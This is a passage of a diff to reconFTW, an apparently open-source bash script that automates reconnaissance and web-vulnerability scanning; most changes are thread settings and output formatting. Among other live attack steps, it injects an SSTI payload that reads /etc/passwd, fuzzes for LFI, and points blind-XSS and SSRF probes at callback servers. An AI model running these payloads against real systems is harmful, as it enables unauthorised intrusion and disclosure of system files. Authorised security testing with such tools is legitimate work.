"$WEBPROBESIMPLE" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -521,14 +482,14 @@ function webprobe_full(){ if ([ ! -f "$called_fn_dir/.${FUNCNAME[0]}" ] || [ "$DIFF" = true ]) && [ "$WEBPROBEFULL" = true ] then start_func "Http probing non standard ports" - cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads 150 -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt + cat subdomains/subdomains.txt | httpx -ports 81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55672 -follow-host-redirects -H "${HEADER}" -status-code -threads $HTTPX_UNCOMMONPORTS_THREADS -timeout 10 -silent -no-color | cut -d ' ' -f1 | grep ".$domain" | anew -q .tmp/probed_uncommon_ports_tmp.txt NUMOFLINES=$(eval cat .tmp/probed_uncommon_ports_tmp.txt $DEBUG_ERROR | anew webs/webs_uncommon_ports.txt | wc -l) notification "Uncommon web ports: ${NUMOFLINES} new websites in ${runtime}" good eval cat webs/webs_uncommon_ports.txt $DEBUG_ERROR end_func "Results are saved in webs/webs_uncommon_ports.txt" ${FUNCNAME[0]} else if [ "$WEBPROBEFULL" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -544,7 +505,7 @@ function screenshot(){ end_func "Results are saved in screenshots folder" ${FUNCNAME[0]} else if [ "$WEBSCREENSHOT" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -569,10 +530,11 @@ function favicon(){ eval mv favicontest.txt $dir/hosts/favicontest.txt $DEBUG_ERROR eval rm favicontest.json $DEBUG_ERROR fi + cd $dir end_func "Results are saved in hosts/favicontest.txt" ${FUNCNAME[0]} else if [ "$FAVICON" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -595,9 +557,9 @@ function portscan(){ eval cat .tmp/ips_nowaf.txt $DEBUG_ERROR | sort printf "${bblue}\n Scanning ports... ${reset}\n\n"; - if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "${domain}_portscan_passive.txt" ] + if [ "$PORTSCAN_PASSIVE" = true ] && [ ! -f "hosts/portscan_passive.txt" ] then - for sub in $(cat .tmp/ips_nowaf.txt); do + for sub in $(cat hosts/ips.txt); do shodan host $sub 2>/dev/null >> hosts/portscan_passive.txt && echo -e "\n\n#######################################################################\n\n" >> hosts/portscan_passive.txt done fi @@ -610,7 +572,7 @@ function portscan(){ end_func "Results are saved in hosts/portscan_[passive|active].txt" ${FUNCNAME[0]} else if [ "$PORTSCANNER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -633,7 +595,7 @@ function waf_checks(){ end_func "Results are saved in webs/webs_wafs.txt" ${FUNCNAME[0]} else if [ "$WAF" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -646,7 +608,7 @@ function nuclei_check(){ start_func "Templates based web scanner" eval nuclei -update-templates $DEBUG_STD mkdir -p nuclei_output - printf "${yellow} Running : Nuclei Technologies${reset}\n\n" + printf "${yellow}\n Running : Nuclei Technologies${reset}\n\n" cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/technologies/ -o nuclei_output/technologies.txt printf "${yellow}\n\n Running : Nuclei Tokens${reset}\n\n" cat webs/webs.txt | nuclei -silent -H "${HEADER}" -t ~/nuclei-templates/exposed-tokens/ -o nuclei_output/tokens.txt @@ -668,7 +630,7 @@ function nuclei_check(){ end_func "Results are saved in nuclei_output folder" ${FUNCNAME[0]} else if [ "$NUCLEICHECK" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -683,14 +645,14 @@ function fuzz(){ for sub in $(cat webs/webs.txt); do printf "${yellow}\n\n Running: Fuzzing in ${sub}${reset}\n" sub_out=$(echo $sub | sed -e 's|^[^/]*//||' -e 's|/.*$||') - ffuf -mc all -fc 404 -ac -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null + ffuf -mc all -fc 404 -ac -t $FFUF_THREADS -sf -s -H "${HEADER}" -w $fuzz_wordlist -maxtime 900 -u $sub/FUZZ -or -o $dir/fuzzing/${sub_out}.tmp &>/dev/null eval cat $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR | jq '[.results[]|{status: .status, length: .length, url: .url}]' | grep -oP "status\":\s(\d{3})|length\":\s(\d{1,7})|url\":\s\"(http[s]?:\/\/.*?)\"" | paste -d' ' - - - | awk '{print $2" "$4" "$6}' | sed 's/\"//g' | sort |anew -q $dir/fuzzing/${sub_out}.txt eval rm $dir/fuzzing/${sub_out}.tmp $DEBUG_ERROR done end_func "Results are saved in fuzzing/*subdomain*.txt" ${FUNCNAME[0]} else if [ "$FUZZ" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -714,10 +676,10 @@ function cms_scanner(){ mv -f $tools/CMSeeK/Result/${sub_out} $dir/cms/ fi done - end_func "Results are saved in cms/*subdomain* folder" + end_func "Results are saved in cms/*subdomain* folder" ${FUNCNAME[0]} else if [ "$CMS_SCANNER" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -749,7 +711,7 @@ function params(){ end_func "Results are saved in webs/param.txt" ${FUNCNAME[0]} else if [ "$PARAMS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -764,19 +726,20 @@ function urlchecks(){ cat webs/webs.txt | waybackurls | anew -q .tmp/url_extract_tmp.txt cat webs/webs.txt | gau | anew -q .tmp/url_extract_tmp.txt if [ "$DEEP" = true ] ; then - gospider -S webs/webs.txt --js -t 50 -d 3 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -d 3 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt else - gospider -S webs/webs.txt --js -t 50 -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt + gospider -S webs/webs.txt --js -t $GOSPIDER_THREADS -H "${HEADER}" --sitemap --robots -w -r | egrep -o 'https?://[^ ]+' | sed 's/]$//' | grep ".$domain$" | anew -q .tmp/url_extract_tmp.txt fi if [ -s "${GITHUB_TOKENS}" ] then - eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -raw $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt + eval github-endpoints -q -k -d $domain -t ${GITHUB_TOKENS} -o .tmp/github-endpoints.txt $DEBUG_STD + eval cat .tmp/github-endpoints.txt $DEBUG_ERROR | anew -q .tmp/url_extract_tmp.txt fi eval cat .tmp/url_extract_tmp.txt webs/param.txt $DEBUG_ERROR | grep "${domain}" | grep "=" | eval qsreplace -a $DEBUG_ERROR | egrep -iv "\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|pdf|svg|txt|js)" | anew -q .tmp/url_extract_tmp2.txt cat .tmp/url_extract_tmp.txt | grep "${domain}" | egrep -i "\.(js)" | anew -q js/url_extract_js.txt eval uddup -u .tmp/url_extract_tmp2.txt -o .tmp/url_extract_uddup.txt $DEBUG_STD NUMOFLINES=$(eval cat .tmp/url_extract_uddup.txt $DEBUG_ERROR | anew webs/url_extract.txt | wc -l) - notification "${NUMOFLINES} new urls in ${runtime}" good + notification "${NUMOFLINES} new urls with params" good end_func "Results are saved in webs/url_extract.txt" ${FUNCNAME[0]} else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" @@ -800,7 +763,7 @@ function url_gf(){ end_func "Results are saved in gf folder" ${FUNCNAME[0]} else if [ "$URL_GF" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -815,9 +778,10 @@ function jschecks(){ cat js/url_extract_js.txt | cut -d '?' -f 1 | grep -iE "\.js$" | anew -q js/jsfile_links.txt cat js/url_extract_js.txt | subjs | anew -q js/jsfile_links.txt printf "${yellow} Running : Resolving JS Urls 2/5${reset}\n" - cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -status-code -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt + cat js/jsfile_links.txt | httpx -follow-redirects -H "${HEADER}" -silent -timeout 15 -threads $HTTPX_THREADS -status-code -no-color | grep "[200]" | cut -d ' ' -f1 | anew -q js/js_livelinks.txt printf "${yellow} Running : Gathering endpoints 3/5${reset}\n" interlace -tL js/js_livelinks.txt -threads 10 -c "python3 $tools/LinkFinder/linkfinder.py -d -i _target_ -o cli >> js/js_endpoints.txt" &>/dev/null + sed -i '/^\//!d' js/js_endpoints.txt printf "${yellow} Running : Gathering secrets 4/5${reset}\n" cat js/js_livelinks.txt | eval nuclei -silent -t ~/nuclei-templates/exposed-tokens/ -o js/js_secrets.txt $DEBUG_STD printf "${yellow} Running : Building wordlist 5/5${reset}\n" @@ -825,7 +789,7 @@ function jschecks(){ end_func "Results are saved in js folder" ${FUNCNAME[0]} else if [ "$JSCHECKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -846,7 +810,7 @@ function wordlist_gen(){ printf "${bgreen}#######################################################################\n\n" else if [ "$WORDLIST" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -867,7 +831,7 @@ function brokenLinks(){ end_func "Results are saved in webs/brokenLinks.txt" ${FUNCNAME[0]} else if [ "$BROKENLINKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -882,20 +846,20 @@ function xss(){ if [ "$DEEP" = true ] ; then if [ -n "$XSS_SERVER" ]; then sed -i "s/^blindPayload = \x27\x27/blindPayload = \x27${XSS_SERVER}\x27/" $tools/XSStrike/core/config.py - eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} else printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" - eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} fi else if [[ $(cat .tmp/xss_reflected.txt | wc -l) -le 200 ]] then if [ -n "$XSS_SERVER" ]; then sed -i "s/^blindPayload = \x27\x27/blindPayload = \x27${XSS_SERVER}\x27/" $tools/XSStrike/core/config.py - eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --blind --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} else printf "${yellow}\n No XSS_SERVER defined, blind xss skipped\n\n" - eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t 30 --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} + eval python3 $tools/XSStrike/xsstrike.py --seeds .tmp/xss_reflected.txt -t $XSSTRIKE_THREADS --crawl --skip > vulns/xss.txt $DEBUG_STD && touch $called_fn_dir/.${FUNCNAME[0]} fi else printf "${bred} Skipping XSS: Too Much URLs to test, try with --deep flag${reset}\n" @@ -904,7 +868,7 @@ function xss(){ end_func "Results are saved in vulns/xss.txt" ${FUNCNAME[0]} else if [ "$XSS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -920,7 +884,7 @@ function cors(){ end_func "Results are saved in webs/cors.txt" else if [ "$CORS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -950,7 +914,7 @@ function open_redirect(){ fi else if [ "$OPEN_REDIRECT" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -968,7 +932,7 @@ function ssrf_checks(){ echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt for url in $(cat .tmp/tmp_ssrf.txt); do - ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} @@ -980,7 +944,7 @@ function ssrf_checks(){ echo $COLLAB_SERVER_FIX | anew -q .tmp/ssrf_server.txt echo $COLLAB_SERVER | anew -q .tmp/ssrf_server.txt for url in $(cat .tmp/tmp_ssrf.txt); do - ffuf -v -H "${HEADER}" -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt + ffuf -v -H "${HEADER}" -t $FFUF_THREADS -w .tmp/ssrf_server.txt -u $url &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssrf.txt done eval python3 $tools/ssrf.py $dir/gf/ssrf.txt $COLLAB_SERVER_FIX $DEBUG_ERROR | anew -q vulns/ssrf.txt end_func "Results are saved in vulns/ssrf.txt" ${FUNCNAME[0]} @@ -994,7 +958,7 @@ function ssrf_checks(){ fi else if [ "$SSRF_CHECKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1009,7 +973,7 @@ function crlf_checks(){ end_func "Results are saved in vulns/crlf.txt" ${FUNCNAME[0]} else if [ "$CRLF_CHECKS" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1022,12 +986,12 @@ function lfi(){ start_func "LFI checks" cat gf/lfi.txt | qsreplace FUZZ | anew -q .tmp/tmp_lfi.txt for url in $(cat .tmp/tmp_lfi.txt); do - ffuf -v -mc 200 -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w $lfi_wordlist -u $url -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/lfi.txt done end_func "Results are saved in vulns/lfi.txt" ${FUNCNAME[0]} else if [ "$LFI" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1039,13 +1003,13 @@ function ssti(){ then start_func "SSTI checks" cat gf/ssti.txt | qsreplace "ssti{{7*7}}" | anew -q .tmp/ssti_fuzz.txt - ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "ssti49" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt cat gf/ssti.txt | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | anew -q .tmp/ssti_fuzz2.txt - ffuf -v -mc 200 -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt + ffuf -v -mc 200 -t $FFUF_THREADS -H "${HEADER}" -w .tmp/ssti_fuzz.txt -u FUZZ -mr "root:" &>/dev/null | grep "URL" | sed 's/| URL | //' | anew -q vulns/ssti.txt end_func "Results are saved in vulns/ssti.txt" ${FUNCNAME[0]} else if [ "$SSTI" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1061,7 +1025,7 @@ function sqli(){ end_func "Results are saved in sqlmap folder" ${FUNCNAME[0]} else if [ "$SQLI" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1076,7 +1040,7 @@ function test_ssl(){ end_func "Results are saved in hosts/testssl.txt" ${FUNCNAME[0]} else if [ "$TEST_SSL" = false ]; then - printf "${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" + printf "\n${yellow} ${FUNCNAME[0]} skipped in this mode or defined in reconftw.cfg ${reset}\n\n" else printf "${yellow} ${FUNCNAME[0]} is already processed, to force executing ${FUNCNAME[0]} delete $called_fn_dir/.${FUNCNAME[0]} ${reset}\n\n" fi @@ -1156,17 +1120,15 @@ function notification(){ } function start_func(){ - printf "${bgreen}#######################################################################\n" + printf "${bgreen}#######################################################################" notification "${1}" info start=`date +%s` - start_spinner } function end_func(){ touch $called_fn_dir/.${2} end=`date +%s` getElapsedTime $start $end - stop_spinner notification "${2} Finished in ${runtime}" info printf "${bblue} ${1} ${reset}\n" printf "${bgreen}#######################################################################\n" @@ -1175,59 +1137,15 @@ function end_func(){ function start_subfunc(){ notification "${1}" warn start_sub=`date +%s` - start_spinner } function end_subfunc(){ touch $called_fn_dir/.${2} end_sub=`date +%s` getElapsedTime $start_sub $end_sub - stop_spinner notification "${1} in ${runtime}" good } -function _spinner() { - - case $1 in - start) - let column=$(tput cols)-${#2}+2 - echo -ne ${2} - printf "%${column}s" - i=1 - sp='⣾⣽⣻⢿⡿⣟⣯⣷' - delay=${SPINNER_DELAY:-0.15} - while : - do - printf "\b${sp:i++%${#sp}:1}" - sleep $delay - done - ;; - stop) - if [[ -z ${1} ]]; then - echo "spinner is not running.." - exit 1 - fi - kill $2 > /dev/null 2>&1 - echo -en "\b " - ;; - *) - echo "invalid argument, try {start/stop}" - exit 1 - ;; - esac -} - -function start_spinner { - _spinner "start" "${1}" | lolcat & - _sp_pid=$! - disown -} - -function stop_spinner { - _spinner "stop" $1 $_sp_pid - unset _sp_pid -} - function start(){ global_start=`date +%s`